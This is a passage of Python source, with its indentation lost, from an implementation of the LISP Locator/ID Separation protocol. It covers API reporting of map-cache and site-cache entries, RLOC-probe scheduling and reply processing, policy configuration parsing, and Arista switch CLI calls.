mr = lisp_fill_rloc_in_json(mrloc)
r["multicast-rloc-set"].append(mr)
#endfor
#endif
rloc_set.append(r)
#endfor
entry["rloc-set"] = rloc_set
data.append(entry)
return([True, data])
#enddef
#
# lisp_fill_rloc_in_json
#
# Fill in fields from lisp_rloc() into the JSON that is reported via the
# restful API.
#
def lisp_fill_rloc_in_json(rloc):
r = {}
if (rloc.rloc_exists()):
r["address"] = rloc.rloc.print_address_no_iid()
#endif
if (rloc.translated_port != 0):
r["encap-port"] = str(rloc.translated_port)
#endif
r["state"] = rloc.print_state()
if (rloc.geo): r["geo"] = rloc.geo.print_geo()
if (rloc.elp): r["elp"] = rloc.elp.print_elp(False)
if (rloc.rle): r["rle"] = rloc.rle.print_rle(False, False)
if (rloc.json): r["json"] = rloc.json.print_json(False)
if (rloc.rloc_name): r["rloc-name"] = rloc.rloc_name
stats = rloc.stats.get_stats(False, False)
if (stats): r["stats"] = stats
r["uptime"] = lisp_print_elapsed(rloc.uptime)
r["upriority"] = str(rloc.priority)
r["uweight"] = str(rloc.weight)
r["mpriority"] = str(rloc.mpriority)
r["mweight"] = str(rloc.mweight)
reply = rloc.last_rloc_probe_reply
if (reply):
r["last-rloc-probe-reply"] = lisp_print_elapsed(reply)
r["rloc-probe-rtt"] = str(rloc.rloc_probe_rtt)
#endif
r["rloc-hop-count"] = rloc.rloc_probe_hops
r["recent-rloc-hop-counts"] = rloc.recent_rloc_probe_hops
r["rloc-probe-latency"] = rloc.rloc_probe_latency
r["recent-rloc-probe-latencies"] = rloc.recent_rloc_probe_latencies
recent_rtts = []
for rtt in rloc.recent_rloc_probe_rtts: recent_rtts.append(str(rtt))
r["recent-rloc-probe-rtts"] = recent_rtts
return(r)
#enddef
#
# lisp_process_api_map_cache_entry
#
# Parse API parameters in dictionary array, do longest match lookup.
#
def lisp_process_api_map_cache_entry(parms):
iid = parms["instance-id"]
iid = 0 if (iid == "") else int(iid)
#
# Get EID or source of (S,G).
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(parms["eid-prefix"])
dest = eid
source = eid
#
# See if we are doing a group lookup. Make that destination and the EID
# the source.
#
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
if (parms.has_key("group-prefix")):
group.store_prefix(parms["group-prefix"])
dest = group
#endif
data = []
mc = lisp_map_cache_lookup(source, dest)
if (mc): status, data = lisp_process_api_map_cache(mc, data)
return(data)
#enddef
#
# lisp_process_api_site_cache_summary
#
# Returns:
#
# [ { "site" : '<site-name>", "registrations" : [ {"eid-prefix" : "<eid>",
# "count" : "<count>", "registered-count" : "<registered>" }, ... ]
# } ]
#
def lisp_process_api_site_cache_summary(site_cache):
site = { "site" : "", "registrations" : [] }
entry = { "eid-prefix" : "", "count" : 0, "registered-count" : 0 }
sites = {}
for ml in site_cache.cache_sorted:
for se in site_cache.cache[ml].entries.values():
if (se.accept_more_specifics == False): continue
if (sites.has_key(se.site.site_name) == False):
sites[se.site.site_name] = []
#endif
e = copy.deepcopy(entry)
e["eid-prefix"] = se.eid.print_prefix()
e["count"] = len(se.more_specific_registrations)
for mse in se.more_specific_registrations:
if (mse.registered): e["registered-count"] += 1
#endfor
sites[se.site.site_name].append(e)
#endfor
#endfor
data = []
for site_name in sites:
s = copy.deepcopy(site)
s["site"] = site_name
s["registrations"] = sites[site_name]
data.append(s)
#endfor
return(data)
#enddef
#
# lisp_process_api_site_cache
#
# Return site-cache to API caller.
#
def lisp_process_api_site_cache(se, data):
#
# There is only destination state in this site-cache entry.
#
if (se.group.is_null()): return(lisp_gather_site_cache_data(se, data))
if (se.source_cache == None): return([True, data])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
data = se.source_cache.walk_cache(lisp_gather_site_cache_data, data)
return([True, data])
#enddef
#
# lisp_process_api_ms_or_mr
#
# Return map-cache to API caller.
#
def lisp_process_api_ms_or_mr(ms_or_mr, data):
address = lisp_address(LISP_AFI_NONE, "", 0, 0)
dns_name = data["dns-name"] if data.has_key("dns-name") else None
if (data.has_key("address")):
address.store_address(data["address"])
#endif
value = {}
if (ms_or_mr):
for ms in lisp_map_servers_list.values():
if (dns_name):
if (dns_name != ms.dns_name): continue
else:
if (address.is_exact_match(ms.map_server) == False): continue
#endif
value["dns-name"] = ms.dns_name
value["address"] = ms.map_server.print_address_no_iid()
value["ms-name"] = "" if ms.ms_name == None else ms.ms_name
return([value])
#endfor
else:
for mr in lisp_map_resolvers_list.values():
if (dns_name):
if (dns_name != mr.dns_name): continue
else:
if (address.is_exact_match(mr.map_resolver) == False): continue
#endif
value["dns-name"] = mr.dns_name
value["address"] = mr.map_resolver.print_address_no_iid()
value["mr-name"] = "" if mr.mr_name == None else mr.mr_name
return([value])
#endfor
#endif
return([])
#enddef
#
# lisp_process_api_database_mapping
#
# Return array of database-mappings configured, include dynamic data like
# translated_rloc in particular.
#
def lisp_process_api_database_mapping():
data = []
for db in lisp_db_list:
entry = {}
entry["eid-prefix"] = db.eid.print_prefix()
if (db.group.is_null() == False):
entry["group-prefix"] = db.group.print_prefix()
#endif
rlocs = []
for r in db.rloc_set:
rloc = {}
if (r.rloc.is_null() == False):
rloc["rloc"] = r.rloc.print_address_no_iid()
#endif
if (r.rloc_name != None): rloc["rloc-name"] = r.rloc_name
if (r.interface != None): rloc["interface"] = r.interface
tr = r.translated_rloc
if (tr.is_null() == False):
rloc["translated-rloc"] = tr.print_address_no_iid()
#endif
if (rloc != {}): rlocs.append(rloc)
#endfor
#
# Add RLOCs array to EID entry.
#
entry["rlocs"] = rlocs
#
# Add EID entry to return array.
#
data.append(entry)
#endfor
return(data)
#enddef
#
# lisp_gather_site_cache_data
#
# Return site-cache to API caller.
#
def lisp_gather_site_cache_data(se, data):
entry = {}
entry["site-name"] = se.site.site_name
entry["instance-id"] = str(se.eid.instance_id)
entry["eid-prefix"] = se.eid.print_prefix_no_iid()
if (se.group.is_null() == False):
entry["group-prefix"] = se.group.print_prefix_no_iid()
#endif
entry["registered"] = "yes" if se.registered else "no"
entry["first-registered"] = lisp_print_elapsed(se.first_registered)
entry["last-registered"] = lisp_print_elapsed(se.last_registered)
addr = se.last_registerer
addr = "none" if addr.is_null() else addr.print_address()
entry["last-registerer"] = addr
entry["ams"] = "yes" if (se.accept_more_specifics) else "no"
entry["dynamic"] = "yes" if (se.dynamic) else "no"
entry["site-id"] = str(se.site_id)
if (se.xtr_id_present):
entry["xtr-id"] = "0x"+ lisp_hex_string(se.xtr_id)
#endif
#
# Encode in RLOC-set which is an array of entries.
#
rloc_set = []
for rloc in se.registered_rlocs:
r = {}
r["address"] = rloc.rloc.print_address_no_iid() if rloc.rloc_exists() \
else "none"
if (rloc.geo): r["geo"] = rloc.geo.print_geo()
if (rloc.elp): r["elp"] = rloc.elp.print_elp(False)
if (rloc.rle): r["rle"] = rloc.rle.print_rle(False, True)
if (rloc.json): r["json"] = rloc.json.print_json(False)
if (rloc.rloc_name): r["rloc-name"] = rloc.rloc_name
r["uptime"] = lisp_print_elapsed(rloc.uptime)
r["upriority"] = str(rloc.priority)
r["uweight"] = str(rloc.weight)
r["mpriority"] = str(rloc.mpriority)
r["mweight"] = str(rloc.mweight)
rloc_set.append(r)
#endfor
entry["registered-rlocs"] = rloc_set
data.append(entry)
return([True, data])
#enddef
#
# lisp_process_api_site_cache_entry
#
# Parse API parameters in dictionary array, do longest match lookup.
#
def lisp_process_api_site_cache_entry(parms):
iid = parms["instance-id"]
iid = 0 if (iid == "") else int(iid)
#
# Get EID or source of (S,G).
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(parms["eid-prefix"])
#
# See if we are doing a group lookup. Make that destination and the EID
# the source.
#
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
if (parms.has_key("group-prefix")):
group.store_prefix(parms["group-prefix"])
#endif
data = []
se = lisp_site_eid_lookup(eid, group, False)
if (se): lisp_gather_site_cache_data(se, data)
return(data)
#enddef
#
# lisp_get_interface_instance_id
#
# Return instance-ID from lisp_interface() class.
#
def lisp_get_interface_instance_id(device, source_eid):
interface = None
if (lisp_myinterfaces.has_key(device)):
interface = lisp_myinterfaces[device]
#endif
#
# Didn't find an instance-ID configured on a "lisp interface", return
# the default.
#
if (interface == None or interface.instance_id == None):
return(lisp_default_iid)
#endif
#
# If there is a single interface data structure for a given device,
# return the instance-ID conifgured for it. Otherwise, check to see
# if this is a multi-tenant EID-prefix. And then test all configured
# prefixes in each lisp_interface() for a best match. This allows
# for multi-tenancy on a single xTR interface.
#
iid = interface.get_instance_id()
if (source_eid == None): return(iid)
save_iid = source_eid.instance_id
best = None
for interface in lisp_multi_tenant_interfaces:
if (interface.device != device): continue
prefix = interface.multi_tenant_eid
source_eid.instance_id = prefix.instance_id
if (source_eid.is_more_specific(prefix) == False): continue
if (best == None or best.multi_tenant_eid.mask_len < prefix.mask_len):
best = interface
#endif
#endfor
source_eid.instance_id = save_iid
if (best == None): return(iid)
return(best.get_instance_id())
#enddef
#
# lisp_allow_dynamic_eid
#
# Returns dynamic-eid-deivce (or device if "dynamic-eid-device" not configured)
# if supplied EID matches configured dynamic-EID in a "lisp interface" command.
# Otherwise, returns None.
#
def lisp_allow_dynamic_eid(device, eid):
if (lisp_myinterfaces.has_key(device) == False): return(None)
interface = lisp_myinterfaces[device]
return_interface = device if interface.dynamic_eid_device == None else \
interface.dynamic_eid_device
if (interface.does_dynamic_eid_match(eid)): return(return_interface)
return(None)
#enddef
#
# lisp_start_rloc_probe_timer
#
# Set the RLOC-probe timer to expire in 1 minute (by default).
#
def lisp_start_rloc_probe_timer(interval, lisp_sockets):
global lisp_rloc_probe_timer
if (lisp_rloc_probe_timer != None): lisp_rloc_probe_timer.cancel()
func = lisp_process_rloc_probe_timer
timer = threading.Timer(interval, func, [lisp_sockets])
lisp_rloc_probe_timer = timer
timer.start()
return
#enddef
#
# lisp_show_rloc_probe_list
#
# Print out the lisp_show_rloc_probe_list in a readable way for debugging.
#
def lisp_show_rloc_probe_list():
lprint(bold("----- RLOC-probe-list -----", False))
for key in lisp_rloc_probe_list:
rloc_array = lisp_rloc_probe_list[key]
lprint("RLOC {}:".format(key))
for r, e, g in rloc_array:
lprint(" [{}, {}, {}, {}]".format(hex(id(r)), e.print_prefix(),
g.print_prefix(), r.translated_port))
#endfor
#endfor
lprint(bold("---------------------------", False))
return
#enddef
#
# lisp_mark_rlocs_for_other_eids
#
# When the parent RLOC that we have RLOC-probe state for comes reachable or
# goes unreachable, set the state appropriately for other EIDs using the SAME
# RLOC. The parent is the first RLOC in the eid-list.
#
def lisp_mark_rlocs_for_other_eids(eid_list):
#
# Don't process parent but put its EID in printed list.
#
rloc, e, g = eid_list[0]
eids = [lisp_print_eid_tuple(e, g)]
for rloc, e, g in eid_list[1::]:
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
eids.append(lisp_print_eid_tuple(e, g))
#endfor
unreach = bold("unreachable", False)
rloc_str = red(rloc.rloc.print_address_no_iid(), False)
for eid in eids:
e = green(eid, False)
lprint("RLOC {} went {} for EID {}".format(rloc_str, unreach, e))
#endfor
#
# For each EID, tell external data-plane about new RLOC-set (RLOCs minus
# the ones that just went unreachable).
#
for rloc, e, g in eid_list:
mc = lisp_map_cache.lookup_cache(e, True)
if (mc): lisp_write_ipc_map_cache(True, mc)
#endfor
return
#enddef
#
# lisp_process_rloc_probe_timer
#
# Periodic RLOC-probe timer has expired. Go through cached RLOCs from map-
# cache and decide to suppress or rate-limit RLOC-probes. This function
# is also used to time out "unreachability" state so we can start RLOC-probe
# a previously determined unreachable RLOC.
#
def lisp_process_rloc_probe_timer(lisp_sockets):
lisp_set_exception()
lisp_start_rloc_probe_timer(LISP_RLOC_PROBE_INTERVAL, lisp_sockets)
if (lisp_rloc_probing == False): return
#
# Debug code. Must rebuild image to set boolean to True.
#
if (lisp_print_rloc_probe_list): lisp_show_rloc_probe_list()
#
# Check for egress multi-homing.
#
default_next_hops = lisp_get_default_route_next_hops()
lprint("---------- Start RLOC Probing for {} entries ----------".format( \
len(lisp_rloc_probe_list)))
#
# Walk the list.
#
count = 0
probe = bold("RLOC-probe", False)
for values in lisp_rloc_probe_list.values():
#
# Just do one RLOC-probe for the RLOC even if it is used for
# multiple EID-prefixes.
#
last_rloc = None
for parent_rloc, eid, group in values:
addr_str = parent_rloc.rloc.print_address_no_iid()
#
# Do not RLOC-probe gleaned entries if configured.
#
glean, do_probe, y = lisp_allow_gleaning(eid, None, parent_rloc)
if (glean and do_probe == False):
e = green(eid.print_address(), False)
addr_str += ":{}".format(parent_rloc.translated_port)
lprint("Suppress probe to RLOC {} for gleaned EID {}".format( \
red(addr_str, False), e))
continue
#endif
#
# Do not send RLOC-probes to RLOCs that are in down-state or admin-
# down-state. The RLOC-probe reply will apply for all EID-prefixes
# and the RLOC state will be updated for each.
#
if (parent_rloc.down_state()): continue
#
# Do not send multiple RLOC-probes to the same RLOC for
# different EID-prefixes. Multiple RLOC entries could have
# same RLOC address but differnet translated ports. These
# need to be treated as different ETRs (they are both behind
# the same NAT) from an RTR's perspective. On an ITR, if the
# RLOC-names are different for the same RLOC address, we need
# to treat these as different ETRs since an ITR does not keep
# port state for an RLOC.
#
if (last_rloc):
parent_rloc.last_rloc_probe_nonce = \
last_rloc.last_rloc_probe_nonce
if (last_rloc.translated_port == parent_rloc.translated_port \
and last_rloc.rloc_name == parent_rloc.rloc_name):
e = green(lisp_print_eid_tuple(eid, group), False)
lprint("Suppress probe to duplicate RLOC {} for {}". \
format(red(addr_str, False), e))
#
# Copy last-rloc send probe timer, so all EIDs using the
# same RLOC can have sync'ed rtts.
#
parent_rloc.last_rloc_probe = last_rloc.last_rloc_probe
continue
#endif
#endif
nh = None
rloc = None
while (True):
rloc = parent_rloc if rloc == None else rloc.next_rloc
if (rloc == None): break
#
# First check if next-hop/interface is up for egress multi-
# homing.
#
if (rloc.rloc_next_hop != None):
if (rloc.rloc_next_hop not in default_next_hops):
if (rloc.up_state()):
d, n = rloc.rloc_next_hop
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
lisp_update_rtr_updown(rloc.rloc, False)
#endif
unreach = bold("unreachable", False)
lprint("Next-hop {}({}) for RLOC {} is {}".format(n, d,
red(addr_str, False), unreach))
continue
#endif
#endif
#
# Send RLOC-probe to unreach-state RLOCs if down for a minute.
#
last = rloc.last_rloc_probe
delta = 0 if last == None else time.time() - last
if (rloc.unreach_state() and delta < LISP_RLOC_PROBE_INTERVAL):
lprint("Waiting for probe-reply from RLOC {}".format( \
red(addr_str, False)))
continue
#endif
#
# Check to see if we are in nonce-echo mode and no echo has
# been returned.
#
echo_nonce = lisp_get_echo_nonce(None, addr_str)
if (echo_nonce and echo_nonce.request_nonce_timeout()):
rloc.state = LISP_RLOC_NO_ECHOED_NONCE_STATE
rloc.last_state_change = lisp_get_timestamp()
unreach = bold("unreachable", False)
lprint("RLOC {} went {}, nonce-echo failed".format( \
red(addr_str, False), unreach))
lisp_update_rtr_updown(rloc.rloc, False)
continue
#endif
#
# Suppress sending RLOC probe if we just a nonce-echo in the
# last minute.
#
if (echo_nonce and echo_nonce.recently_echoed()):
lprint(("Suppress RLOC-probe to {}, nonce-echo " + \
"received").format(red(addr_str, False)))
continue
#endif
#
# Check if we have not received a RLOC-probe reply for one
# timer interval. If not, put RLOC state in "unreach-state".
#
if (rloc.last_rloc_probe != None):
last = rloc.last_rloc_probe_reply
if (last == None): last = 0
delta = time.time() - last
if (rloc.up_state() and \
delta >= LISP_RLOC_PROBE_REPLY_WAIT):
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
lisp_update_rtr_updown(rloc.rloc, False)
unreach = bold("unreachable", False)
lprint("RLOC {} went {}, probe it".format( \
red(addr_str, False), unreach))
lisp_mark_rlocs_for_other_eids(values)
#endif
#endif
rloc.last_rloc_probe = lisp_get_timestamp()
reach = "" if rloc.unreach_state() == False else " unreachable"
#
# Send Map-Request RLOC-probe. We may have to send one for each
# egress interface to the same RLOC address. Install host
# route in RLOC so we can direct the RLOC-probe on an egress
# interface.
#
nh_str = ""
n = None
if (rloc.rloc_next_hop != None):
d, n = rloc.rloc_next_hop
lisp_install_host_route(addr_str, n, True)
nh_str = ", send on nh {}({})".format(n, d)
#endif
#
# Print integrated log message before sending RLOC-probe.
#
rtt = rloc.print_rloc_probe_rtt()
astr = addr_str
if (rloc.translated_port != 0):
astr += ":{}".format(rloc.translated_port)
#endif
astr= red(astr, False)
if (rloc.rloc_name != None):
astr += " (" + blue(rloc.rloc_name, False) + ")"
#endif
lprint("Send {}{} {}, last rtt: {}{}".format(probe, reach,
astr, rtt, nh_str))
#
# If we are doing multiple egress interfaces, check for host
# routes. We don't want the ones we selected for forwarding to
# affect the path RLOC-probes go out in the following loop. We
# will restore the host route while waiting for RLOC-replies.
# Then we'll select a new host route based on best RTT.
#
if (rloc.rloc_next_hop != None):
nh = lisp_get_host_route_next_hop(addr_str)
if (nh): lisp_install_host_route(addr_str, nh, False)
#endif
#
# Might be first time and other RLOCs on the chain may not
# have RLOC address. Copy now.
#
if (rloc.rloc.is_null()):
rloc.rloc.copy_address(parent_rloc.rloc)
#endif
#
# Send RLOC-probe Map-Request.
#
seid = None if (group.is_null()) else eid
deid = eid if (group.is_null()) else group
lisp_send_map_request(lisp_sockets, 0, seid, deid, rloc)
last_rloc = parent_rloc
#
# Remove installed host route.
#
if (n): lisp_install_host_route(addr_str, n, False)
#endwhile
#
# Reisntall host route for forwarding.
#
if (nh): lisp_install_host_route(addr_str, nh, True)
#
# Send 10 RLOC-probes and then sleep for 20 ms.
#
count += 1
if ((count % 10) == 0): time.sleep(0.020)
#endfor
#endfor
lprint("---------- End RLOC Probing ----------")
return
#enddef
#
# lisp_update_rtr_updown
#
# The lisp-itr process will send an IPC message to the lisp-etr process for
# the RLOC-probe status change for an RTR.
#
def lisp_update_rtr_updown(rtr, updown):
global lisp_ipc_socket
#
# This is only done on an ITR.
#
if (lisp_i_am_itr == False): return
#
# When the xtr-parameter indicates to register all RTRs, we are doing it
# conditionally so we don't care about the status. Suppress IPC messages.
#
if (lisp_register_all_rtrs): return
rtr_str = rtr.print_address_no_iid()
#
# Check if RTR address is in LISP the lisp-itr process learned from the
# map-server.
#
if (lisp_rtr_list.has_key(rtr_str) == False): return
updown = "up" if updown else "down"
lprint("Send ETR IPC message, RTR {} has done {}".format(
red(rtr_str, False), bold(updown, False)))
#
# Build IPC message.
#
ipc = "rtr%{}%{}".format(rtr_str, updown)
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
return
#enddef
#
# lisp_process_rloc_probe_reply
#
# We have received a RLOC-probe Map-Reply, process it.
#
def lisp_process_rloc_probe_reply(rloc_entry, source, port, map_reply, ttl,
mrloc):
rloc = rloc_entry.rloc
nonce = map_reply.nonce
hc = map_reply.hop_count
probe = bold("RLOC-probe reply", False)
map_reply_addr = rloc.print_address_no_iid()
source_addr = source.print_address_no_iid()
pl = lisp_rloc_probe_list
jt = rloc_entry.json.json_string if rloc_entry.json else None
ts = lisp_get_timestamp()
#
# If this RLOC-probe reply is in response to a RLOC-probe request to a
# multicast RLOC, then store all responses. Create a lisp_rloc() for new
# entries.
#
if (mrloc != None):
multicast_rloc = mrloc.rloc.print_address_no_iid()
if (mrloc.multicast_rloc_probe_list.has_key(map_reply_addr) == False):
nrloc = lisp_rloc()
nrloc = copy.deepcopy(mrloc)
nrloc.rloc.copy_address(rloc)
nrloc.multicast_rloc_probe_list = {}
mrloc.multicast_rloc_probe_list[map_reply_addr] = nrloc
#endif
nrloc = mrloc.multicast_rloc_probe_list[map_reply_addr]
nrloc.last_rloc_probe_nonce = mrloc.last_rloc_probe_nonce
nrloc.last_rloc_probe = mrloc.last_rloc_probe
r, eid, group = lisp_rloc_probe_list[multicast_rloc][0]
nrloc.process_rloc_probe_reply(ts, nonce, eid, group, hc, ttl, jt)
mrloc.process_rloc_probe_reply(ts, nonce, eid, group, hc, ttl, jt)
return
#endif
#
# If we can't find RLOC address from the Map-Reply in the probe-list,
# maybe the same ETR is sending sourcing from a different address. Check
# that address in the probe-list.
#
addr = map_reply_addr
if (pl.has_key(addr) == False):
addr += ":" + str(port)
if (pl.has_key(addr) == False):
addr = source_addr
if (pl.has_key(addr) == False):
addr += ":" + str(port)
lprint(" Received unsolicited {} from {}/{}, port {}". \
format(probe, red(map_reply_addr, False), red(source_addr,
False), port))
return
#endif
#endif
#endif
#
# Look for RLOC in the RLOC-probe list for EID tuple and fix-up stored
# RLOC-probe state.
#
for rloc, eid, group in lisp_rloc_probe_list[addr]:
if (lisp_i_am_rtr):
if (rloc.translated_port != 0 and rloc.translated_port != port):
continue
#endif
#endif
rloc.process_rloc_probe_reply(ts, nonce, eid, group, hc, ttl, jt)
#endfor
return
#enddef
#
# lisp_db_list_length
#
# Returns the number of entries that need to be registered. This will include
# static and dynamic EIDs.
#
def lisp_db_list_length():
count = 0
for db in lisp_db_list:
count += len(db.dynamic_eids) if db.dynamic_eid_configured() else 1
count += len(db.eid.iid_list)
#endif
return(count)
#endif
#
# lisp_is_myeid
#
# Return true if supplied EID is an EID supported by this ETR. That means a
# longest match lookup is done.
#
def lisp_is_myeid(eid):
for db in lisp_db_list:
if (eid.is_more_specific(db.eid)): return(True)
#endfor
return(False)
#enddef
#
# lisp_format_macs
#
# Take two MAC address strings and format them with dashes and place them in
# a format string "0000-1111-2222 -> 3333-4444-5555" for displaying in
# lisp.dprint().
#
def lisp_format_macs(sa, da):
sa = sa[0:4] + "-" + sa[4:8] + "-" + sa[8:12]
da = da[0:4] + "-" + da[4:8] + "-" + da[8:12]
return("{} -> {}".format(sa, da))
#enddef
#
# lisp_get_echo_nonce
#
# Get lisp_nonce_echo() state from lisp_nonce_echo_list{}.
#
def lisp_get_echo_nonce(rloc, rloc_str):
if (lisp_nonce_echoing == False): return(None)
if (rloc): rloc_str = rloc.print_address_no_iid()
echo_nonce = None
if (lisp_nonce_echo_list.has_key(rloc_str)):
echo_nonce = lisp_nonce_echo_list[rloc_str]
#endif
return(echo_nonce)
#enddef
#
# lisp_decode_dist_name
#
# When we have reached an AFI=17 in an EID or RLOC record, return the
# distinguished name, and new position of packet.
#
def lisp_decode_dist_name(packet):
count = 0
dist_name = ""
while(packet[0:1] != "\0"):
if (count == 255): return([None, None])
dist_name += packet[0:1]
packet = packet[1::]
count += 1
#endwhile
packet = packet[1::]
return(packet, dist_name)
#enddef
#
# lisp_write_flow_log
#
# The supplied flow_log variable is an array of [datetime, lisp_packet]. This
# function is called and run in its own thread and then exits.
#
def lisp_write_flow_log(flow_log):
f = open("./logs/lisp-flow.log", "a")
count = 0
for flow in flow_log:
packet = flow[3]
flow_str = packet.print_flow(flow[0], flow[1], flow[2])
f.write(flow_str)
count += 1
#endfor
f.close()
del(flow_log)
count = bold(str(count), False)
lprint("Wrote {} flow entries to ./logs/lisp-flow.log".format(count))
return
#enddef
#
# lisp_policy_command
#
# Configure "lisp policy" commands for all processes that need it.
#
def lisp_policy_command(kv_pair):
p = lisp_policy("")
set_iid = None
match_set = []
for i in range(len(kv_pair["datetime-range"])):
match_set.append(lisp_policy_match())
#endfor
for kw in kv_pair.keys():
value = kv_pair[kw]
#
# Check for match parameters.
#
if (kw == "instance-id"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.source_eid == None):
match.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
if (match.dest_eid == None):
match.dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
match.source_eid.instance_id = int(v)
match.dest_eid.instance_id = int(v)
#endfor
#endif
if (kw == "source-eid"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.source_eid == None):
match.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
iid = match.source_eid.instance_id
match.source_eid.store_prefix(v)
match.source_eid.instance_id = iid
#endfor
#endif
if (kw == "destination-eid"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.dest_eid == None):
match.dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
iid = match.dest_eid.instance_id
match.dest_eid.store_prefix(v)
match.dest_eid.instance_id = iid
#endfor
#endif
if (kw == "source-rloc"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.source_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
match.source_rloc.store_prefix(v)
#endfor
#endif
if (kw == "destination-rloc"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.dest_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
match.dest_rloc.store_prefix(v)
#endfor
#endif
if (kw == "rloc-record-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.rloc_record_name = v
#endfor
#endif
if (kw == "geo-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.geo_name = v
#endfor
#endif
if (kw == "elp-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.elp_name = v
#endfor
#endif
if (kw == "rle-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.rle_name = v
#endfor
#endif
if (kw == "json-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.json_name = v
#endfor
#endif
if (kw == "datetime-range"):
for i in range(len(match_set)):
v = value[i]
match = match_set[i]
if (v == ""): continue
l = lisp_datetime(v[0:19])
u = lisp_datetime(v[19::])
if (l.valid_datetime() and u.valid_datetime()):
match.datetime_lower = l
match.datetime_upper = u
#endif
#endfor
#endif
#
# Check for set parameters.
#
if (kw == "set-action"):
p.set_action = value
#endif
if (kw == "set-record-ttl"):
p.set_record_ttl = int(value)
#endif
if (kw == "set-instance-id"):
if (p.set_source_eid == None):
p.set_source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
if (p.set_dest_eid == None):
p.set_dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
set_iid = int(value)
p.set_source_eid.instance_id = set_iid
p.set_dest_eid.instance_id = set_iid
#endif
if (kw == "set-source-eid"):
if (p.set_source_eid == None):
p.set_source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
p.set_source_eid.store_prefix(value)
if (set_iid != None): p.set_source_eid.instance_id = set_iid
#endif
if (kw == "set-destination-eid"):
if (p.set_dest_eid == None):
p.set_dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
p.set_dest_eid.store_prefix(value)
if (set_iid != None): p.set_dest_eid.instance_id = set_iid
#endif
if (kw == "set-rloc-address"):
p.set_rloc_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
p.set_rloc_address.store_address(value)
#endif
if (kw == "set-rloc-record-name"):
p.set_rloc_record_name = value
#endif
if (kw == "set-elp-name"):
p.set_elp_name = value
#endif
if (kw == "set-geo-name"):
p.set_geo_name = value
#endif
if (kw == "set-rle-name"):
p.set_rle_name = value
#endif
if (kw == "set-json-name"):
p.set_json_name = value
#endif
if (kw == "policy-name"):
p.policy_name = value
#endif
#endfor
#
# Store match clauses and policy.
#
p.match_clauses = match_set
p.save_policy()
return
#enddef
lisp_policy_commands = {
"lisp policy" : [lisp_policy_command, {
"policy-name" : [True],
"match" : [],
"instance-id" : [True, 0, 0xffffffff],
"source-eid" : [True],
"destination-eid" : [True],
"source-rloc" : [True],
"destination-rloc" : [True],
"rloc-record-name" : [True],
"elp-name" : [True],
"geo-name" : [True],
"rle-name" : [True],
"json-name" : [True],
"datetime-range" : [True],
"set-action" : [False, "process", "drop"],
"set-record-ttl" : [True, 0, 0x7fffffff],
"set-instance-id" : [True, 0, 0xffffffff],
"set-source-eid" : [True],
"set-destination-eid" : [True],
"set-rloc-address" : [True],
"set-rloc-record-name" : [True],
"set-elp-name" : [True],
"set-geo-name" : [True],
"set-rle-name" : [True],
"set-json-name" : [True] } ]
}
#
# lisp_send_to_arista
#
# Send supplied CLI command to Arista so it can be configured via its design
# rules.
#
def lisp_send_to_arista(command, interface):
interface = "" if (interface == None) else "interface " + interface
cmd_str = command
if (interface != ""): cmd_str = interface + ": " + cmd_str
lprint("Send CLI command '{}' to hardware".format(cmd_str))
commands = '''
enable
configure
{}
{}
'''.format(interface, command)
os.system("FastCli -c '{}'".format(commands))
return
#enddef
#
# lisp_arista_is_alive
#
# Ask hardware if EID-prefix is alive. Return True if so.
#
def lisp_arista_is_alive(prefix):
cmd = "enable\nsh plat trident l3 software routes {}\n".format(prefix)
output = commands.getoutput("FastCli -c '{}'".format(cmd))
#
# Skip over header line.
#
output = output.split("\n")[1]
flag = output.split(" ")
flag = flag[-1].replace("\r", "")
#
# Last column has "Y" or "N" for hit bit.
#
return(flag == "Y")
#enddef
#
# lisp_program_vxlan_hardware
#
# This function is going to populate hardware that can do VXLAN encapsulation.
# It will add an IPv4 route via the kernel pointing to a next-hop on a
# VLAN interface that is being bridged to other potential VTEPs.
#
# The responsibility of this routine is to do the following programming:
#
# route add <eid-prefix> <next-hop>
# arp -s <next-hop> <mac-address>
#
# to the kernel and to do this Arista specific command:
#
# mac address-table static <mac-address> vlan 4094 interface vxlan 1
# vtep <vtep-address>
#
# Assumptions are:
#
# (1) Next-hop address is on the subnet for interface vlan4094.
# (2) VXLAN routing is already setup and will bridge <mac-address> to
# the VTEP address this function supplies.
# (3) A "ip virtual-router mac-address" is configured that will match the
# algorithmic mapping this function is doing between VTEP's IP address
